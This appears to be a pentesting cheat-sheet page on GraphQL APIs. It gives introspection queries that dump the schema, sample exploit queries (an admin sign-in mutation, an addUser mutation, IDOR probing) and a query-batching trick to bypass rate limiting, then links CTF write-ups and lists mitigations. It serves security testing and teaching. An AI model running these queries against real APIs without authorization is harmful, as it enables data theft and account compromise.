# GraphQL

## Tools

Install this and point it to the target

{% embed url="<https://github.com/graphql/graphql-playground>" %}

## Initial Testing

```
query{__typename}

should return

{"__typename": "query"}}
```

## Enumeration

Introspection to view the entire structure of the storage, and available queries to run

{% code overflow="wrap" %}

```
{__schema{types{name,fields{name}}}}

{__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}

{__schema{queryType{name}mutationType{name}subscriptionType{name}types{…FullType}directives{name description locations args{…InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated :true){name description args{…InputValue}type{…TypeRef}isDeprecated deprecationReason}inputFields{…InputValue}interfaces{…TypeRef}enumValues(includeDeprecated :true){name description isDeprecated deprecationReason}possibleTypes{…TypeRef}}fragment InputValue on __InputValue{name description type{…TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
```

{% endcode %}

## Exploit Examples

### Mutation to modify data

```
mutation{signIn(login:"Admin", password:"secretp@ssw0rd"){token}}
mutation{addUser(id:"1", name:"Dan Abramov", email:"dan@dan.com") {id name email}}
```

### Querying IDOR

Use IDOR to see if you can access data that is not listed

```
query{product(id: 3) {id name listed}}
```

### Batching Attacks

To bypass rate-limiting, a you can send multiple queries in a single GraphQL payload

<figure><img src="https://3058261645-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FJdAk5WnJDW6XiiRqO51Y%2Fuploads%2F9PmVnEYo2azpMaQkltAf%2Ftext-3-1024x483-1.png?alt=media&#x26;token=7f5e5508-3ac0-4d76-83c6-e5f3cb21ce55" alt=""><figcaption></figcaption></figure>

## Exploits Write Ups

{% embed url="<https://ctftime.org/writeup/7475>" %}

Vulnerability lies in not ensuring the order ID belongs to a user ID. When an order is deleted, the amount is refunded to any user ID that is entered in the field

{% embed url="<https://hg8.sh/posts/misc-ctf/graphql-injection/>" %}

SQL injection leading to crafting arbitrary GraphQL queries. Introspection leaked the schema, which allowed the attacker to query sensitive data.

{% embed url="<https://jaimelightfoot.com/blog/hack-in-paris-2019-ctf-meet-your-doctor-graphql-challenge/>" %}

Basic introspection leading to querying of sensitive information

## Mitigations

* If your API is not intended for use by the general public, disable introspection on it.&#x20;
* If your API is intended for use by the general public then you will likely need to leave introspection enabled. However, you should review the API's schema to make sure that it does not expose unintended fields to the public.
* Make sure that suggestions are disabled. This prevents attackers from being able to use Clairvoyance or similar tools to glean information about the underlying schema. You cannot disable suggestions directly in Apollo.
* Make sure that your API's schema does not expose any private user fields, such as email addresses or user IDs.